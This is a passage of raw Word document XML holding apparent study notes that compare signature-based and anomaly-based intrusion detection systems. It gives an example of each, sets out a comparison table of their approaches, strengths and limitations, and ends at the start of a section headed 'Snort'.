        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The difference between signature-based IDS and anomaly-based IDS lies in their approach to detecting and identifying intrusions or suspicious activities. Here's an explanation of each with their distinctions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3834BA" w14:textId="77777777" w:rsidR="00EB0770" w:rsidRPr="00EB0770" w:rsidRDefault="00EB0770" w:rsidP="00EB0770">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="450"/>
        </w:tabs>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB0770">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Signature-based IDS: Signature-based IDS, also known as rule-based IDS or pattern matching IDS, operates by comparing observed events or data against a database of known attack signatures or patterns. It looks for specific patterns or signatures that match known malicious activities. If a match is found, an alert is generated, indicating a potential intrusion or attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494B9684" w14:textId="77777777" w:rsidR="00EB0770" w:rsidRPr="00EB0770" w:rsidRDefault="00EB0770" w:rsidP="00EB0770">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB0770">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Example: Suppose a signature-based IDS has a database of known virus signatures. When the IDS scans incoming network traffic or files, it compares the data against its signature database. If it detects a match between the observed data and a known virus signature, it generates an alert to notify the administrator about the potential presence of the virus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DA22B6" w14:textId="77777777" w:rsidR="00EB0770" w:rsidRPr="00EB0770" w:rsidRDefault="00EB0770" w:rsidP="00EB0770">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="90"/>
        </w:tabs>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB0770">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Anomaly-based IDS: Anomaly-based IDS, also referred to as behavior-based IDS or statistical anomaly detection, focuses on monitoring normal patterns of behavior within a system or network. It establishes a baseline of normal behavior and identifies deviations or anomalies from that baseline. Anomaly-based IDS looks for activities or behaviors that are statistically different or unusual compared to established norms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FA8CE0" w14:textId="5F3A8987" w:rsidR="00B362B8" w:rsidRDefault="00EB0770" w:rsidP="00EB0770">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB0770">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Example: An anomaly-based IDS monitors network traffic and records typical network behavior over a period of time. It establishes thresholds for normal network traffic patterns, such as the number of </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB0770">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>connections, data transfer rates, or protocols used. If the IDS detects network traffic that significantly deviates from the established norms, such as an unusually high number of connection attempts or a sudden surge in data transfer, it generates an alert to indicate a potential anomaly or intrusion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BAFBBF" w14:textId="1758CA52" w:rsidR="005972A8" w:rsidRDefault="005972A8" w:rsidP="00EB0770">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44566FE6" w14:textId="4EEAFEBF" w:rsidR="005972A8" w:rsidRDefault="005972A8" w:rsidP="00EB0770">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Answer in table form:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283BD5A2" w14:textId="1A7F5F14" w:rsidR="005972A8" w:rsidRDefault="005972A8" w:rsidP="00EB0770">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9715" w:type="dxa"/>
        <w:tblInd w:w="-360" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3116"/>
        <w:gridCol w:w="3117"/>
        <w:gridCol w:w="3482"/>
      </w:tblGrid>
      <w:tr w:rsidR="007B23DD" w14:paraId="59E62DDF" w14:textId="77777777" w:rsidTr="007B23DD">
        <w:trPr>
          <w:trHeight w:val="458"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F567368" w14:textId="77777777" w:rsidR="007B23DD" w:rsidRDefault="007B23DD" w:rsidP="00EB0770">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6296478D" w14:textId="63A33147" w:rsidR="007B23DD" w:rsidRPr="007B23DD" w:rsidRDefault="007B23DD" w:rsidP="007B23DD">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Signature-based IDS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3482" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A43E648" w14:textId="1E246F16" w:rsidR="007B23DD" w:rsidRPr="00761A61" w:rsidRDefault="00761A61" w:rsidP="007B23DD">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Anomaly-based IDS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B23DD" w14:paraId="5E383367" w14:textId="77777777" w:rsidTr="007B23DD">
        <w:trPr>
          <w:trHeight w:val="440"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6E7ABC6B" w14:textId="4B74155F" w:rsidR="007B23DD" w:rsidRDefault="00761A61" w:rsidP="00EB0770">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Detection approach</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="759B5119" w14:textId="2E2DA64A" w:rsidR="007B23DD" w:rsidRDefault="00761A61" w:rsidP="00761A61">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00761A61">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Compares observed events against known attack</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00761A61">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>signatures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3482" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="62833294" w14:textId="1ED3506A" w:rsidR="007B23DD" w:rsidRDefault="00761A61" w:rsidP="00EB0770">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00761A61">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Establishes a baseline of normal behavior</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B23DD" w14:paraId="501E5C19" w14:textId="77777777" w:rsidTr="007B23DD">
        <w:trPr>
          <w:trHeight w:val="440"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2D18D5E1" w14:textId="5F5FEBA4" w:rsidR="007B23DD" w:rsidRDefault="00761A61" w:rsidP="00EB0770">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Focus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2CD1DBF3" w14:textId="60D70029" w:rsidR="007B23DD" w:rsidRDefault="00761A61" w:rsidP="00EB0770">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00761A61">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Matches patterns or signatures of known attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3482" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="09EFD07F" w14:textId="5F5F721A" w:rsidR="007B23DD" w:rsidRDefault="00761A61" w:rsidP="00EB0770">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00761A61">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Identifies deviations or anomalies from the baseline</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B23DD" w14:paraId="65D54A0D" w14:textId="77777777" w:rsidTr="007B23DD">
        <w:trPr>
          <w:trHeight w:val="440"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="37BFFB42" w14:textId="3F7733E8" w:rsidR="007B23DD" w:rsidRDefault="00761A61" w:rsidP="00EB0770">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Database</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5B16D417" w14:textId="2D050909" w:rsidR="007B23DD" w:rsidRDefault="00761A61" w:rsidP="00EB0770">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00761A61">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Relies on a database of known attack signatures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3482" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="15D34A47" w14:textId="335F6DA8" w:rsidR="007B23DD" w:rsidRDefault="00761A61" w:rsidP="00EB0770">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00761A61">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Establishes thresholds for normal behavior</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B23DD" w14:paraId="1D4F45B0" w14:textId="77777777" w:rsidTr="007B23DD">
        <w:trPr>
          <w:trHeight w:val="440"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4286C0C5" w14:textId="61C087EA" w:rsidR="007B23DD" w:rsidRDefault="00761A61" w:rsidP="00EB0770">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Detection coverage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="469E1C8F" w14:textId="04083D74" w:rsidR="007B23DD" w:rsidRDefault="00761A61" w:rsidP="00EB0770">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00761A61">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Effective in identifying known threats</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3482" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3ABA6F5E" w14:textId="1CF5623D" w:rsidR="007B23DD" w:rsidRDefault="00761A61" w:rsidP="00EB0770">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00761A61">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Can detect new or previously unknown attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B23DD" w14:paraId="76BC1388" w14:textId="77777777" w:rsidTr="007B23DD">
        <w:trPr>
          <w:trHeight w:val="440"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="053130EE" w14:textId="5B75F0D7" w:rsidR="007B23DD" w:rsidRDefault="00761A61" w:rsidP="00EB0770">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Strengths</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4B2ED295" w14:textId="0F555C2F" w:rsidR="007B23DD" w:rsidRDefault="00761A61" w:rsidP="00EB0770">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00761A61">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Precise detection of known attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3482" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5E5179D7" w14:textId="362E406C" w:rsidR="007B23DD" w:rsidRDefault="00761A61" w:rsidP="00EB0770">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00761A61">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Ability to detect novel or zero-day attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B23DD" w14:paraId="73FB820A" w14:textId="77777777" w:rsidTr="00B13EA4">
        <w:trPr>
          <w:trHeight w:val="683"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28462DDC" w14:textId="2E95FEF3" w:rsidR="007B23DD" w:rsidRDefault="00761A61" w:rsidP="00EB0770">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Limitations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="275A28AA" w14:textId="5A93BDF9" w:rsidR="007B23DD" w:rsidRDefault="00761A61" w:rsidP="00EB0770">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00761A61">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Limited to known attack signatures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3482" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="48D6D022" w14:textId="5CED5209" w:rsidR="007B23DD" w:rsidRDefault="00761A61" w:rsidP="00EB0770">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00761A61">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Potential for false positives from normal variances</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="236F30B9" w14:textId="6EA6B4D5" w:rsidR="005972A8" w:rsidRDefault="005972A8" w:rsidP="00EB0770">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="498617D8" w14:textId="70B47EA1" w:rsidR="00E52AD2" w:rsidRPr="00E52AD2" w:rsidRDefault="00E52AD2" w:rsidP="009A1C25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E52AD2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Snort</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
